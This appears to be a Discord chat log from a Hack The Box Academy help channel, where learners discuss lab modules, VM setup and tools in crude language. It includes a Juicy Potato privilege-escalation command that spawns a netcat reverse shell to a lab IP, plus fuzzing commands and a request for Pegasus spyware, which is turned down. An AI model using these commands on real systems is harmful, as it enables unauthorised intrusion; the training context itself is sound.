this machine is slow as balls!
like for the last 1.5 hours i've barely been able to do what would take me 10 minutes on normal machine. this shit fuckin sucks ass no wonder htb only charges 8 dollars!
lmao, I was thinking about getting the vip so I joined the Disc to see everyone's opinions on it
it wont make a difference this machine is just slower than an 80 yr olds erection!
all the other machines pretty solid
it literally takes 5 seconds per command you type
and btw, why does my name look like this?
Oh nvm I get it, but the bot doesnt want to auth
same problem , please guide me
Alright thanks for inspiring me to swap over to obsidian now. It was a pain as it is and my notebook isn't huge yet. It would have been killer if I waited any longer
I was looking at Obsidian recently as well and would be interested in your opinion. Been using Cherrytree the last 2-3 years and it's getting kind of bulky.
Well, this isn't my first time using obsidian. I used it back when I first started but swapped to notion because I needed something that was easily portable.
The very obvious downside to obsidian is that it'll take some extra magic to allow you to sync your files across multiple locations
Aside from that though its very very good
I would really need something to be able to port my cherrytree to obsidian. I know there's something out there, but it requires some troubleshooting and I haven't had the time to debug it.
I really like the group/mapping that comes with Obsidian. Feels like a better way to organize your notes, especially at scale.
Need guidance on: Footprinting - Hard Lab. I have completed all the steps to reach the user on the ssh server, I have enumerated what feels like everything but cannot seem to see the way forward.
Oh hold on found something...
Got it.
Hi teams,
I’m stuck at the final question regarding “what user account has many Event ID (4625) logon failures”
This is what I’ve done:
get-winevent -FilterHashTable @{Logname='Security';ID=4625} | select-object -expandproperty Message. Appreciate your help!
i dm u
hey you still on i for sure can help
sent a friend request
Hey guys not sure if this question is related to here or not but: By buying the university plan for HTB academy it grants me access to all tier 2 modules, but I am not sure if that includes Job paths. So If I get the university plan does that grant me access to a job path role, or do I have to get that separately?
it does include job paths. All modules contained inside the job paths are tier 2 or lower.
stuck on Attacking Common Applications - Skills Assessment II on the
Q3 What is the FQDN of the third vhost?
Already have the creds for the application but every answer i input is wrong.
Sanity Edit: After you get the foothold in the machine, run apachectl -S and it'll show every vhost on the IP address
in metasploit framework module in session and jobs section i am facing problems to get a session , facing an error "failed authentication " please guide me
stuck on Attacking Common Applications - Skills Assessment II
Last question - Where is the flag? Searched everywhere and still nothing
Edit: The flag is in the same directory you land in, i was just too tired to look for it in a bunch of files.
Guys when will SRT track will renew in hack the box?
quick question. does htb vip also teach how to hack a https website?
hai guise does htb academy teach me how to hack my girlfriend's facebook
What specifically about HTTPS do you need to learn? Website stack and protocol are two different things really.
You don't "hack HTTPS".
look it is kinda useless to be able to find security faults in a http server because they almost don't exist anymore
Sure what are you struggling with? Bypassing WAF?
That is not what i mean.
it really is just a yes/no question tbh idk why you are so tilted. we all know you did not shower for a week
I'm trying to help you buddy but you don't seem to know what you're asking.
well can you reverse shell a https website like you could with an http site?
The reverse shell comes from the server behind it, not the protocol it's serving you the website on.
then what does https secure?
The data you're transferring to and from the website.
At a super basic level think Wireshark in a cafe. HTTP plain text. HTTPS encrypted.
does that not make it impossible to send for example nc.exe
No. Otherwise every https website you visit would equally just be encrypted garbage that you can't render.
It's also decrypted.
so it makes the ip encrypted?
No
Behind the protocol nothing really changes. You could for example host a website that you built today without an SSL certificate, and visit it with HTTP. You can set up SSL on the server and switch over to HTTPS and nothing will have changed on the stack.
No, the data you're transferring to and from it.
If you know your osi or tcp/ip model, everything at the ip layer is unencrypted. It’s the application layer that’s encrypted
so how does that help prevent you from getting hacked?
It prevents your data being snaffled up in transit.
It doesn't protect the server in any particular way.
Can i dm you? I've been fuzzing for days now...
24hr ffuf. dat wordlist 😭
nah multiple, changed stuff but just cant get valid creds :S
its the only thing i still need to do and it took me the longest lol
Which module? I'll avoid it xD
@eternal moss dm me
yes
Okay, so I am trying to get a repository but I am getting a fatal repository error, it says not found. I am running `sudo git clone https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt`
But I get this response.
`fatal: repository 'https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt/' not found`
you can only clone the git not a specific file
if you want to download that file specifically you can wget or curl -o
Ohh, my brain wasn't working, let me try that
are you using the pwnbox or your own machine?
My own machine, I can't use the pwnbox as I only get one use out of it a day
parrot or Kali?
Parrot
Had to reinstall my entire system because I somehow corrupted it and lost almost all my files, and weirdly enough, it didnt have that file
ah okay. I wouldve told you that the kali repo has Seclists already but looks like you're good to go
I have SecLists, but not that one that I need
Also I tried Kali Linux, but it was so slow even though I gave it 8gb of ram and 1/2 my CPU, probably user error on my side lol
Ryzen 5 5600g, so it shouldn't have had any issues
But thank you for this, that helped made my brain work lol
yeah I've stuck to it especially when I take OSCP in the future
True
I may switch back as I liked the UI a little better, but I need to get a designated drive for linux so I can boot into that instead of running VM's
Both run the same for me. What are you using to virtualise?
I've noticed no difference in both. Kali breaks. Parrot breaks.
Kali has better repos so I went back to it
Paravirtualization interface?
yeah and you dont get support from OSCP if you use parrot
Well right now im just learning everything, once I get a full list of everything I need, im going to go back to kali linux, but its set to default on both
VMWare / Virtualbox etc
OH virtualbox, can't afford a paid one
I would invest into a paid one for snapshots and such
You can snapshot in Virtualbox for free.
#snapshotsnotabackup
I like to keep a snapshot of the VM post install with basic UI set up always haha
True
im not a fan of VBox but thats just me
I also learned to not do chmod 700 everything, as that breaks linux completely. I did that and lost 40 hours of work to corrupted files that I couldn't recover
I get that, I have literally no money just trying to learn this skill, because everywhere around me is looking for local pentesters for their networks
VirtualBox is fine tbh. Don't worry about it.
Yeah I havent had any issues besides my 1gbps connection gets limited to 10mbps inside of the machine even though I've made it have full duplex speeds
i use lxc for my kali / blackarch
i will be damned if there is a 0day on kernel but meh ill take the risk
lxc is cool but I need windows VMs too
you can use qemu also for windows
but i've multiple machines so i just rdp in to a windows box if i need it
Hey guys, need some help for the Windows Privilege Escalation - Skills Assessment 1. I noticed the ||SeImpersonatePrivilege privilege|| and I'm trying to exploit it with ||Juicy Potato||, as in a previous lesson. I'm trying to run the following command: ||.\jp.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\users\public\nc.exe 10.10.x.y 4444 -e cmd.exe" -t *||, but I get a weird error:
||Testing {4991d34b-80a1-4291-83b6-3328366b9097} 53375
COM -> recv failed with error: 10038||
you can use the list on tool github
I ran the GetCLSID.ps1 script but it didn't give me any clsid?
```
Name Used (GB) Free (GB) Provider Root
HKCR Registry HKEY_CLASSES_ROOT
Looking for CLSIDs
Looking for APIDs
Joining CLSIDs and APIDs
```
oh you don't need to run that because you can just use the default list on the tool github with test_clsid.bat
Not sure I understand. I ran the test_clsid.bat and it outputted stuff like:
{31143611-AC65-4568-AE76-8A9DAD50EA88} 10000
{c8b67f54-d1cb-44bf-9103-a1ab9a9ed8ad} 10000
But I get the exact same error when I try .\juicypotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\users\public\nc.exe 10.10.15.28 5566 -e cmd.exe" -t * -c "{c8b67f54-d1cb-44bf-9103-a1ab9a9ed8ad}"
I used the list for ||windows server 2016 standard||
If you run tasklist and run down the clsid list quickly from top to bottom you'll find a matching service pretty quickly btw.
oh i didn't know that thanks for the tip
tasklist doesn't show clsid? It's like
System Idle Process 0 0 4 K
it shows you running processes
and the clsid list shows you processes and their clsid
it's a good idea to understand what you're even doing rather than just smashing through scripts imo
I mean not in depth, but understand what the CLSID relates to even haha
I'm trying to but I literally have no idea what clsids are
i just checked my notes and i understand next to nothing so that's just great but basically if you put the test script with the list and the tool in the same directory and run the script it will give you result.log which is the list of CLSID that you can use
Glad I'm not the only one
So for me I think of them as unique identifiers for applications. In this instance you'll want the ID of a process running as system
All that bat file is doing is running a for loop against the list and juicypotato.exe lol
You don't need to understand them. On the juicy potato github there's a list of CLSIDs just pick one for the OS that you're on.
Some will work some won't. It's a bit of trial and error
I just tried 2 more random ones and it worked, gave me a shell
I hate Windows
🤷♂️
I find windows to be fascinating
But you do need to understand everything you're doing
windows is blackbox with a bit of manual that is incomplete
Yeah it's wild. Linux is boring 😄
Yea. Theres so much to learn with windows
There's so much more happening under the hood than most people realize
And so many ways to abuse built in features
Which is what makes it horrible imo
Especially coupled with the lack of information on how stuff works
Ehh. You can learn most of it with some research and experimentation
But most people don't like attacking windows cuz it takes so much longer to learn than linux
Ye
Some parts also feel like true legacy
Like they hacked together 20 years ago and left the same since "it works"
Based opinion
Also Windows being proprietary is a big reason not to like it especially from a privacy and security perspective. There have been studies that show that security vulnerabilities in Linux are fixed much faster than they are in windows
Well Microsoft is notoriously bad with security lol
Takes them forever to fix anything
And according to them "UAC isn't a security control so we don't care if people can bypass it"
I think they have gotten better
But you are completely correct that they have a bad history
The decentralization and lack of corporate bureaucracy makes linux more secure by design imo
Anyone for sqlmap essentials ?
What’s your issue?
What's the point of it then?
Or do they just not care about privilege escalation at all?
Just pinged you on DM
Alright, now i know what the solution is for the the endgame Broken Auth: Skills Assessment i've some feedback that could help others that are failing this module:
- ||first get a valid user that you did not make on the box||
- ||You can enumerate users 2 ways, don't try to privesc that way, first get a valid user||
i hope the mods don't think this is spoiling, else, just remove my comment
I am in HTB academy, I have started the topic of active directory and there is a question that does not give me as good, the question is the following “What container in AD holds deleted objects?”, I am putting that it is the AD recycle bin , but it does not give it to me as valid. Someone could help me to find out what is happening or to know if that question gives an error to the page or something
There's a whole section about it in the text you were supposed to read.
A {ANSWER} is a container object in AD that holds deleted AD objects.
Okey i look for that
If you've given up reading by the 3rd page you're in for a rough ride xD
Okey i find that thanks
I had not read it well and I have not seen it, too many hours in front of the PC
Go take a break instead of wasting your time not absorbing information then 😄 Come back fresh and learn. 💪
Still having issues with the mounting to the share part of the "NTFS vs. Share Permissions" lesson of the Windows Fundamental module
Was able to connect to the share this time by disabling the firewall, but I'm still getting the "mount point does not exist" error when I attempt to mount to the share. Any suggestions?
hi guys, sorry to disturb u, just buy the rastalab access but i cant find the info for the entry point anyone can help ? thx
use ++verify at #bot-commands and check #prolabs-rastalabs if that's what you need
oh okay thx
Good question
NoSQLi module, assessment II: is cracking a hash required? Since the procedure seems quite expensive, I'd love to know.
Anyone mind helping on Shells & Payloads? Im at the live engagement however the machine that you have to RDP to with xfreerdp is well, a bit messed up. There is no browser whatsoever and it seems to be slow. Anyone else having this issue?
I don't think so
Thank you! I think I chose the wrong path, then.
Quick question on Password Attacks Lab - Easy: Will the provided user\pass\custom.rules get me past the front door? Going to take a long time if so... Password attempt 12246 of 9780576
(Password reset 😉 )
I did something radically more sophisticated, which gave me the user hash, which I can't crack 😦
Ooh...
DM me.
DM me.
Shells & Payloads: This issue has a solution, just run firefox http://(IP) in your terminal to get a browser. Maybe not as self evident but it does work, and the box does have working internet connection.
The new Experimental Integrated Terminal on Academy is very cool.
Anywhere here finish the SQL injection foundations section in HTB Academy I have a question/ need some help
Anyone*
Yes
Roc Wool (593789667502194701) has been banned until 2023-02-23 19:25:43 (UTC).
anyone available for the last question on attacking SMB - Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer. Have the password but cannot ssh into the box as the indicated user, am i missing something? Module is attacking common services. Thank you
Tip: smbclient
not sure i get the tip, are you for a quick dm or explain further here?
You are not supposed to SSH with the credentials you have...
Hunt for something else (you give it 600 ;))
oh ok.. let me see if i can find it
ahhhh got it, thanks for the help!
What is a good way to get a response size using the curl command. I'm trying to utilize the -fs command on ffuf, but I need to figure out a way to get the response size. Thank you.
curl -s http://IP | wc -c
Does this do?
It does but it seems that error response sizes are only giving me 0. I'm currently working on the virtual hosts lab in the information gathering - web edition module.
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/fierce-hostlist.txt -u http://10.129.32.102 -H "HOST: FUZZ.inlanefreight.htb" -fs (this is the command I'm trying to run)
here is a tip that will save you time, add the -ac flag and ffuf will take care of filtering and matching
Thank you friend, ffuf seems to be returning the correct subdomains now.
Hello, the AD that controls the authentication requests for the domains is the domain controller, right?
Can someone help me with attacking common webapplications osticket
Broken authentication - predictable reset token - question#2.
I understand the coding algorithm for htbuser, but what to do next? How can i change htbadmin password, if the token is sent to htbadmin email?
@hazy grotto hey thought I message you here. Better channel, but yeah both ways work. Also if you need help I have almost finished the entire module. Just need one more question lol
I Dm'd you
Damn what do i need to do with osticket
Get the creds?
I guess is not signing up at gitlab
Long time no see!
Dont mind i got it
Anyone mind providing help on Shells & Payloads, live engagement with host 2? the exploit isn't working properly
Shells & Payloads, Live engagement, Host 2: If you ever run into an error running the exploit in metasploit, the code doesn't need to be changed. The option VHOST needs to be set to the url of the website i.e. blog.inlanefreight.local.
4 hours of my life vanished going through that engagement. I guess most engagements last a year so I’ll consider myself lucky. 😉
yeah that one was a biiiiitch
itd be easy if it didn't take 10 seconds per click or command
Bahaha. The blog website scrolling was brutal
Is there a way to make the RDP window bigger? That killed me too.
rdesktop but the machine was slow as shiiiit
can do -f option for full screen but that isn't good b/c can't use host desktop
there was one more rdp that let you manually adjust the windows rdesktop is supposed to but machine wouldn't readjust(the target machine)
Ye it was long, but the feeling of joy when you get it finally haha
Yeah small screen is a pain
I guess my joke didn’t land but thanks
For your assistance
hello @everyone can i have help on the local file inclusion final skill assessment module ?? thanks
Hi everyone, anyone knows how to get pegasus spyware for free?
No mate. Not here
stuck with the first question in web proxies skill assessment with the /lucky.php button thing. i inspect element and removed disabled in the thing and enabled the button and when i click on it it still doesn't give me the flag
Then where
that button will give you the flag randomly but the chance is kinda low
@rustic sage if u have access to the internet u can understand that pegasus is not free
Hi @all
i have a question. I want to buy htb academy platinum annual subscription. is it possible?
Is it possible to buy only the silver package annually?
everything that you need to know is on the billing page

Hello, I have a problem with the Pivoting, Tunneling, and Port Forwarding module with Meterpreter Tunneling & Port Forwarding.
When I try to do the Meterpreter Reverse Port Forwarding, it doesn't work, I don't get any response. However, I have followed all the steps, redone several times etc..
@sinful falcon DM me
ok
Hello!
Why do people end up in this room specifically to ask stupid shit?
Will I get access to other channels only after I complete that verification?
Ohh is this the only place you can speak unverified? Makes more sense.
Oh, cuz this server has so less channels with so many members
So, it's reasonable to assume that that's the case
If you link Discord to your HTB account you should be fine going forward.
I just want to know whether there are other channels or not
I suppose there's no Academy Discord verification, it's specifically to the boxes etc.
Hmmmm, I don't have access to those
Do you use HTB or are you just joining a random discord?
I want to learn ethical hacking and that's why I joined this server
Searched on Google "ethical hacking discord servers"
Came across this thing
Well yeah this is an okay place to start. It's a Discord primarily for people who use www.hackthebox.com
Oh, ok. Looks like I need to complete that silly verification thing
If you're super new to be honest I'd recommend you start your journey over at www.tryhackme.com They'll walk you through beginner stuff a lot better.
I'm actually learning from a book named "Ethical hacking for dummies"
THM have much better beginner skill paths. HTB generally assumes a level of knowledge and it'd suck if you don't know much.
Ok, will check it out
And ChatGPT has been a great help tbh
They've even got an Advent of Christmas event on rn, lots of beginner focused small instructional challenges each day.
Like everything else, I won't say that it's perfect but it's been really helpful
And made learning a lot easier and fun
Cool, I know some dev friends who have integrated chatgpt into a workflow successfully. It's not hugely useful for CTF purposes but can help if you're shitty with python like me haha
I'm also learning Python but I'm currently focusing on learning ethical hacking. I understand that I'll need a strong foundation in at least one of the programming languages that is used for that purpose, but I'll learn it ad hoc while learning to hack. Also, I have practiced a lot of PHP and JavaScript
Can anyone give me some help with the 'Web Attacks - Skills Assessment'?
What's that?
This room is for the modules of Hack the Box academy.
it's a module on HackTheBox Academy.
Oh, ok.
sure what's the issue?
You won't need to really worry about programming until you know you need it. It's good to be able to "read" these things (HTML, PHP, JS, Ruby, Python) but you won't have to learn to write software lol. A scripting language is useful for just automating some tooling but if you're just starting out don't get bogged down in that.
@marsh pumice if you are new to this give both of these videos a check to see what you should learn first
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM
Find out what you're particularly psyched about first, then worry about that.
hello can you be precise?
i think i have completed that module 😅
Hello I am having an issue with the openvpn setup for my vm
getting connection refused error
Hello, I have a question concerning AD enumeration - Living off the land
I am asked the following question: 'What domain user is explicitly listed as a member of the local Administrators group on the target host?'
however if I run for example: net group 'Local Admins' /domain
I see that there are a dozen members in the Local Admins group
In the ...domain...?
The question is asking which accounts are admin on the host. You're asking it to list accounts on the domain. There's another command you need to be using.
or specifically "Administrators" on the local host.
In fact I have problems with all the Reverse Port Forwarding, even with the "Remote/Reverse Port Forwarding with SSH" lesson